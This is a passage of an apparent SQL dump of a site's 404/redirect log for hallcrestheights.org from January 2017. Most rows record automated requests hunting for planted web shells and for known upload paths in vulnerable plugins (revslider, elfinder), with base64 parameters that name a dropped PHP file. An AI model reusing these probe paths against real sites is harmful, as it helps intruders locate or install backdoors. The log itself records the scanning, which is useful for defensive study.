16:01:58','0000-00-00 00:00:00'),(5856,'http://hallcrestheights.org//cache/news.php?z3=Z1RYNkpSLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:02:02','0000-00-00 00:00:00'),(5857,'http://hallcrestheights.org//tmp.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',4,0,'2017-01-19 16:02:04','0000-00-00 00:00:00'),(5858,'http://hallcrestheights.org//shootme.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:02:07','0000-00-00 00:00:00'),(5859,'http://hallcrestheights.org//configurationbak.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:02:09','0000-00-00 00:00:00'),(5860,'http://hallcrestheights.org//robots.txt.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:02:11','0000-00-00 00:00:00'),(5861,'http://hallcrestheights.org//jconfig.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:02:12','0000-00-00 00:00:00'),(5862,'http://hallcrestheights.org//media/reads.php?z3=Z1RYNkpSLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:02:15','0000-00-00 00:00:00'),(5863,'http://hallcrestheights.org//media/1ndex.php?z3=Z1RYNkpSLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:02:16','0000-00-00 00:00:00'),(5864,'http://hallcrestheights.org//sql_dump.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:02:18','0000-00-00 00:00:00'),(5865,'http://hallcrestheights.org//images/laj.php?z3=Z1RYNkpSLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:02:20','0000-00-00 00:00:00'),(5866,'http://hallcrestheights.org//media/404.php?z3=Z1RYNkpSLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:02:24','0000-00-00 00:00:00'),(5867,'http://hallcrestheights.org//media/tmp.php?z3=Z1RYNkpSLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:02:26','0000-00-00 00:00:00'),(5868,'http://hallcrestheights.org//r3x.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:02:29','0000-00-00 00:00:00'),(5869,'http://hallcrestheights.org//log.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:02:31','0000-00-00 00:00:00'),(5870,'http://hallcrestheights.org//images/stories/0day.php?z3=Z1RYNkpSLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:02:33','0000-00-00 00:00:00'),(5871,'http://hallcrestheights.org//includes/u2p.php?z3=Z1RYNkpSLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:02:35','0000-00-00 00:00:00'),(5872,'http://hallcrestheights.org//images/xxx.php?z3=Z1RYNkpSLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:02:38','0000-00-00 00:00:00'),(5873,'http://hallcrestheights.org//al277.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:02:42','0000-00-00 00:00:00'),(5874,'http://hallcrestheights.org//cache/cache_aqbmkwwx.php?z3=Z1RYNkpSLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:02:44','0000-00-00 00:00:00'),(5875,'http://hallcrestheights.org//install.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:02:47','0000-00-00 00:00:00'),(5876,'http://hallcrestheights.org//dswat.org/wsdl.php?z3=Z1RYNkpSLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:02:49','0000-00-00 00:00:00'),(5877,'http://hallcrestheights.org//robot.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:02:51','0000-00-00 00:00:00'),(5878,'http://hallcrestheights.org//wsdl.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:02:53','0000-00-00 00:00:00'),(5879,'http://hallcrestheights.org//goog1es.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:02:55','0000-00-00 00:00:00'),(5880,'http://hallcrestheights.org//site/tmp/cTivrC.php?z3=Z1RYNkpSLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:02:57','0000-00-00 00:00:00'),(5881,'http://hallcrestheights.org//update.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:02:59','0000-00-00 00:00:00'),(5882,'http://hallcrestheights.org//includes.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:03:01','0000-00-00 00:00:00'),(5883,'http://hallcrestheights.org//wp-main.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:03:04','0000-00-00 00:00:00'),(5884,'http://hallcrestheights.org//news.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:03:06','0000-00-00 00:00:00'),(5885,'http://hallcrestheights.org//images/al277.php?z3=Z1RYNkpSLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:03:07','0000-00-00 00:00:00'),(5886,'http://hallcrestheights.org//webconfig.txt.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:03:09','0000-00-00 00:00:00'),(5887,'http://hallcrestheights.org//cache/cachee.php?z3=Z1RYNkpSLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:03:12','0000-00-00 00:00:00'),(5888,'http://hallcrestheights.org//thumb.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:03:14','0000-00-00 00:00:00'),(5889,'http://hallcrestheights.org//SessionController.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:03:17','0000-00-00 00:00:00'),(5890,'http://hallcrestheights.org//maill.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:03:19','0000-00-00 00:00:00'),(5891,'http://hallcrestheights.org//error-log.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:03:22','0000-00-00 00:00:00'),(5892,'http://hallcrestheights.org//authenticating.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:03:25','0000-00-00 00:00:00'),(5893,'http://hallcrestheights.org//google-assist.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:03:27','0000-00-00 00:00:00'),(5894,'http://hallcrestheights.org//images/google-assist.php?z3=Z1RYNkpSLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:03:28','0000-00-00 00:00:00'),(5895,'http://hallcrestheights.org//images/robots.txt.php?z3=Z1RYNkpSLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:03:31','0000-00-00 00:00:00'),(5896,'http://hallcrestheights.org//elements.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:03:32','0000-00-00 00:00:00'),(5897,'http://hallcrestheights.org//xmlsrpc.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:03:34','0000-00-00 00:00:00'),(5898,'http://hallcrestheights.org//wp-cache.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:03:36','0000-00-00 00:00:00'),(5899,'http://hallcrestheights.org//images/404.php?z3=Z1RYNkpSLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:03:38','0000-00-00 00:00:00'),(5900,'http://hallcrestheights.org//images/head.php?z3=Z1RYNkpSLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:03:40','0000-00-00 00:00:00'),(5901,'http://hallcrestheights.org//cache/support.php?z3=Z1RYNkpSLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:03:42','0000-00-00 00:00:00'),(5902,'http://hallcrestheights.org//RoseLeif.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:03:44','0000-00-00 00:00:00'),(5903,'http://hallcrestheights.org//Abbrevsprl.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:03:47','0000-00-00 00:00:00'),(5904,'http://hallcrestheights.org//show.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:03:48','0000-00-00 00:00:00'),(5905,'http://hallcrestheights.org//images/defau1t.php?z3=Z1RYNkpSLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:03:51','0000-00-00 00:00:00'),(5906,'http://hallcrestheights.org//cli/40dd1d.php?z3=Z1RYNkpSLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:03:53','0000-00-00 00:00:00'),(5907,'http://hallcrestheights.org//infos.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:03:56','0000-00-00 00:00:00'),(5908,'http://hallcrestheights.org//cache/defau1t.php?z3=Z1RYNkpSLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:03:58','0000-00-00 00:00:00'),(5909,'http://hallcrestheights.org//bookmark.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:04:02','0000-00-00 00:00:00'),(5910,'http://hallcrestheights.org//configbak.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:04:04','0000-00-00 00:00:00'),(5911,'http://hallcrestheights.org//wp-data.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:04:06','0000-00-00 00:00:00'),(5912,'http://hallcrestheights.org//wp-content/plugins/Fbrrchive.php?z3=Z1RYNkpSLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:04:08','0000-00-00 00:00:00'),(5913,'http://hallcrestheights.org//wp-content/uploads/Fbrrchive.php?z3=Z1RYNkpSLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:04:10','0000-00-00 00:00:00'),(5914,'http://hallcrestheights.org//wp-content/plugins/myshe.php?z3=Z1RYNkpSLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:04:11','0000-00-00 00:00:00'),(5915,'http://hallcrestheights.org//wp-content/plugins/wp-cache.php?z3=Z1RYNkpSLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:04:13','0000-00-00 00:00:00'),(5916,'http://hallcrestheights.org//wp-content/plugins/wp-footers.php?z3=Z1RYNkpSLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:04:15','0000-00-00 00:00:00'),(5917,'http://hallcrestheights.org//wp-content/plugins/wpfootes.php?z3=Z1RYNkpSLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:04:17','0000-00-00 00:00:00'),(5918,'http://hallcrestheights.org//wp-content/plugins/sql_dump.php?z3=Z1RYNkpSLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:04:19','0000-00-00 00:00:00'),(5919,'http://hallcrestheights.org//wp-content/plugins/SocketIontrol.php?z3=Z1RYNkpSLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:04:20','0000-00-00 00:00:00'),(5920,'http://hallcrestheights.org//wp-content/plugins/SocketIasrgasfontrol.php?z3=Z1RYNkpSLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:04:23','0000-00-00 00:00:00'),(5921,'http://hallcrestheights.org//wp-content/plugins/Analyser.php?z3=Z1RYNkpSLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:04:25','0000-00-00 00:00:00'),(5922,'http://hallcrestheights.org//cache/list.php?z3=Z1RYNkpSLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:04:27','0000-00-00 00:00:00'),(5923,'http://hallcrestheights.org//modules/mod_simplefileuploadv1.3/elements/gTX6JR.php',NULL,'','',1,0,'2017-01-19 16:05:15','0000-00-00 00:00:00'),(5924,'http://hallcrestheights.org//wp-content/plugins/revslider/temp/update_extract/gTX6JR.php',NULL,'','',1,0,'2017-01-19 16:05:16','0000-00-00 00:00:00'),(5925,'http://hallcrestheights.org//wp-content/uploads/gTX6JR.php',NULL,'','',1,0,'2017-01-19 16:05:20','0000-00-00 00:00:00'),(5926,'http://hallcrestheights.org//gTX6JR.php',NULL,'','',1,0,'2017-01-19 16:05:22','0000-00-00 00:00:00'),(5927,'http://hallcrestheights.org//sites/all/libraries/elfinder/files/gTX6JR.php',NULL,'','',1,0,'2017-01-19 16:05:23','0000-00-00 00:00:00'),(5928,'http://hallcrestheights.org/tmp/sirina.php?Gassrini',NULL,'','',4,0,'2017-01-19 16:05:26','0000-00-00 00:00:00'),(5929,'http://www.hallcrestheights.org/privacy-policy.html/administrator/',NULL,'http://www.hallcrestheights.org/privacy-policy.html/administrator/','',1,0,'2017-01-19 17:09:24','0000-00-00 00:00:00'),(5930,'http://www.hallcrestheights.org/gnfzn-xvjx-i20162632-palt-itjshkyj-k42684-yldpijaa-mdurta-enpgg-wtdvlx-tdqku-nfglqrh.htm',NULL,'','',2,0,'2017-01-19 23:06:47','0000-00-00 00:00:00'),(5931,'http://www.hallcrestheights.org/pdf/officeinves.pdf',NULL,'','',9,0,'2017-01-20 04:46:02','0000-00-00 00:00:00'),(5932,'http://www.hallcrestheights.org/k1057-tkuyk-fjdnjj-bucyu-i20162635-paja-ylrlwfv-dyruqpkl-sdefhxdf/',NULL,'http://search.yahoo.co.jp/','',14,0,'2017-01-20 09:26:29','0000-00-00 00:00:00'),(5933,'http://hallcrestheights.org/nktt.php',NULL,'','',39,0,'2017-01-20 13:33:25','0000-00-00 00:00:00'),(5934,'http://hallcrestheights.org//images/1ndex.php?z3=OHQ5QlJWLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:23:26','0000-00-00 00:00:00'),(5935,'http://hallcrestheights.org//sqlbak.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-01-20 16:24:02','0000-00-00 00:00:00'),(5936,'http://hallcrestheights.org//email.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:24:04','0000-00-00 00:00:00'),(5937,'http://hallcrestheights.org//functions.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:24:07','0000-00-00 00:00:00'),(5938,'http://hallcrestheights.org//cache/news.php?z3=OHQ5QlJWLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:24:10','0000-00-00 00:00:00'),(5939,'http://hallcrestheights.org//tmp.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',4,0,'2017-01-20 16:24:14','0000-00-00 00:00:00'),(5940,'http://hallcrestheights.org//shootme.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-01-20 16:25:18','0000-00-00 00:00:00'),(5941,'http://hallcrestheights.org//configurationbak.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:25:20','0000-00-00 00:00:00'),(5942,'http://hallcrestheights.org//robots.txt.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:25:23','0000-00-00 00:00:00'),(5943,'http://hallcrestheights.org//jconfig.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:25:26','0000-00-00 00:00:00'),(5944,'http://hallcrestheights.org//media/reads.php?z3=OHQ5QlJWLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:25:28','0000-00-00 00:00:00'),(5945,'http://hallcrestheights.org//media/1ndex.php?z3=OHQ5QlJWLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:25:29','0000-00-00 00:00:00'),(5946,'http://hallcrestheights.org//sql_dump.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:25:31','0000-00-00 00:00:00'),(5947,'http://hallcrestheights.org//images/laj.php?z3=OHQ5QlJWLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:25:34','0000-00-00 00:00:00'),(5948,'http://hallcrestheights.org//media/404.php?z3=OHQ5QlJWLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:25:37','0000-00-00 00:00:00'),(5949,'http://hallcrestheights.org//media/tmp.php?z3=OHQ5QlJWLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:25:39','0000-00-00 00:00:00'),(5950,'http://hallcrestheights.org//r3x.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:25:40','0000-00-00 00:00:00'),(5951,'http://hallcrestheights.org//log.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:25:41','0000-00-00 00:00:00'),(5952,'http://hallcrestheights.org//images/stories/0day.php?z3=OHQ5QlJWLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:25:44','0000-00-00 00:00:00'),(5953,'http://hallcrestheights.org//includes/u2p.php?z3=OHQ5QlJWLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:25:45','0000-00-00 00:00:00'),(5954,'http://hallcrestheights.org//images/xxx.php?z3=OHQ5QlJWLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:25:47','0000-00-00 00:00:00'),(5955,'http://hallcrestheights.org//al277.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:25:49','0000-00-00 00:00:00'),(5956,'http://hallcrestheights.org//cache/cache_aqbmkwwx.php?z3=OHQ5QlJWLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:25:51','0000-00-00 00:00:00'),(5957,'http://hallcrestheights.org//install.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:25:52','0000-00-00 00:00:00'),(5958,'http://hallcrestheights.org//dswat.org/wsdl.php?z3=OHQ5QlJWLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:25:53','0000-00-00 00:00:00'),(5959,'http://hallcrestheights.org//robot.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:25:54','0000-00-00 00:00:00'),(5960,'http://hallcrestheights.org//wsdl.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:25:56','0000-00-00 00:00:00'),(5961,'http://hallcrestheights.org//goog1es.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:25:57','0000-00-00 00:00:00'),(5962,'http://hallcrestheights.org//site/tmp/cTivrC.php?z3=OHQ5QlJWLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:25:59','0000-00-00 00:00:00'),(5963,'http://hallcrestheights.org//update.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:26:01','0000-00-00 00:00:00'),(5964,'http://hallcrestheights.org//includes.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:26:02','0000-00-00 00:00:00'),(5965,'http://hallcrestheights.org//wp-main.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:26:03','0000-00-00 00:00:00'),(5966,'http://hallcrestheights.org//news.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:26:04','0000-00-00 00:00:00'),(5967,'http://hallcrestheights.org//images/al277.php?z3=OHQ5QlJWLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:26:06','0000-00-00 00:00:00'),(5968,'http://hallcrestheights.org//webconfig.txt.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:26:07','0000-00-00 00:00:00'),(5969,'http://hallcrestheights.org//cache/cachee.php?z3=OHQ5QlJWLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:26:09','0000-00-00 00:00:00'),(5970,'http://hallcrestheights.org//thumb.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:26:10','0000-00-00 00:00:00'),(5971,'http://hallcrestheights.org//SessionController.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:29:14','0000-00-00 00:00:00'),(5972,'http://hallcrestheights.org//maill.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:29:16','0000-00-00 00:00:00'),(5973,'http://hallcrestheights.org//error-log.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:29:19','0000-00-00 00:00:00'),(5974,'http://hallcrestheights.org//authenticating.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:29:21','0000-00-00 00:00:00'),(5975,'http://hallcrestheights.org//google-assist.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:29:23','0000-00-00 00:00:00'),(5976,'http://hallcrestheights.org//images/google-assist.php?z3=OHQ5QlJWLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:29:24','0000-00-00 00:00:00'),(5977,'http://hallcrestheights.org//images/robots.txt.php?z3=OHQ5QlJWLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:29:25','0000-00-00 00:00:00'),(5978,'http://hallcrestheights.org//elements.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:29:27','0000-00-00 00:00:00'),(5979,'http://hallcrestheights.org//xmlsrpc.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:29:30','0000-00-00 00:00:00'),(5980,'http://hallcrestheights.org//wp-cache.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:29:32','0000-00-00 00:00:00'),(5981,'http://hallcrestheights.org//images/404.php?z3=OHQ5QlJWLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:29:33','0000-00-00 00:00:00'),(5982,'http://hallcrestheights.org//images/head.php?z3=OHQ5QlJWLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:29:34','0000-00-00 00:00:00'),(5983,'http://hallcrestheights.org//cache/support.php?z3=OHQ5QlJWLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:29:36','0000-00-00 00:00:00'),(5984,'http://hallcrestheights.org//RoseLeif.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:29:37','0000-00-00 00:00:00'),(5985,'http://hallcrestheights.org//Abbrevsprl.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:29:38','0000-00-00 00:00:00'),(5986,'http://hallcrestheights.org//show.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:29:40','0000-00-00 00:00:00'),(5987,'http://hallcrestheights.org//images/defau1t.php?z3=OHQ5QlJWLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:29:42','0000-00-00 00:00:00'),(5988,'http://hallcrestheights.org//cli/40dd1d.php?z3=OHQ5QlJWLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:29:43','0000-00-00 00:00:00'),(5989,'http://hallcrestheights.org//infos.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:29:44','0000-00-00 00:00:00'),(5990,'http://hallcrestheights.org//cache/defau1t.php?z3=OHQ5QlJWLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:29:45','0000-00-00 00:00:00'),(5991,'http://hallcrestheights.org//bookmark.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:29:46','0000-00-00 00:00:00'),(5992,'http://hallcrestheights.org//configbak.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:29:47','0000-00-00 00:00:00'),(5993,'http://hallcrestheights.org//wp-data.php?z3=OHQ5QlJWLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:29:48','0000-00-00 00:00:00'),(5994,'http://hallcrestheights.org//wp-content/plugins/Fbrrchive.php?z3=OHQ5QlJWLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:29:50','0000-00-00 00:00:00'),(5995,'http://hallcrestheights.org//wp-content/uploads/Fbrrchive.php?z3=OHQ5QlJWLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:29:51','0000-00-00 00:00:00'),(5996,'http://hallcrestheights.org//wp-content/plugins/myshe.php?z3=OHQ5QlJWLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:29:52','0000-00-00 00:00:00'),(5997,'http://hallcrestheights.org//wp-content/plugins/wp-cache.php?z3=OHQ5QlJWLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:29:54','0000-00-00 00:00:00'),(5998,'http://hallcrestheights.org//wp-content/plugins/wp-footers.php?z3=OHQ5QlJWLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-20 16:29:55','0000-00-00 